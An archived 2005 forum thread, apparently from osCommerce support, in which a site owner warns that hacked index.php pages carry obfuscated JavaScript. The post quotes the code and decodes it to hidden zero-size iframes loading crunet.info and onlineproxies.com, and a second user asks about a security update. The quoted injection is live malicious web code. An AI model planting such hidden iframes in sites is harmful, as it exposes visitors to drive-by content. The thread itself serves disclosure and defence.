bluetrope Posted November 30, 2005 Share Posted November 30, 2005 One of my osCommerce sites was recently hacked. It's sneaky: a bit of escaped javascript is inserted at the end of (seemingly) all index.php pages in an osCommerce installation. The code is preceeded by > 80 blanks, so it is not readily visible when editing without wordwrap. Here's the code: <script language=javascript>function func(){if (window.status != " ") { window.status = " "; }} stop = window.setInterval("func()",7);</script><script language=javascript>document.write(unescape('%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%63%72%75%6e%65%74%2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%6f%6e%6c%69%6e%65%70%72%6f%78%69%65%73%2e%63%6f%6d%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e'));</script> Unescaped, you have a document.write of: <IFRAME SRC=http://crunet.info/out.php?s_id=1" WIDTH=0 HEIGHT=0 style="display:none"></IFRAME> <IFRAME SRC=http://onlineproxies.com/out.php?s_id=1" WIDTH=0 HEIGHT=0 style="display:none"></IFRAME> which is doing god knows what on these servers (in Moscow and UK respectively). Beware! Symptoms are cookies originating from crunet.info and onlineproxies.com, and with certain versions of IE6 execution results in a redirect to http:/// and a 404. -RN Snead Link to comment Share on other sites More sharing options...
kirchenbauer Posted November 30, 2005 Share Posted November 30, 2005 Thank you for warning everyone. Did you install the newest security release that came out about a week or two weeks ago? I don't know if that release addresses this problem or not, but thought I'd mention it. Thanks for the warning... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.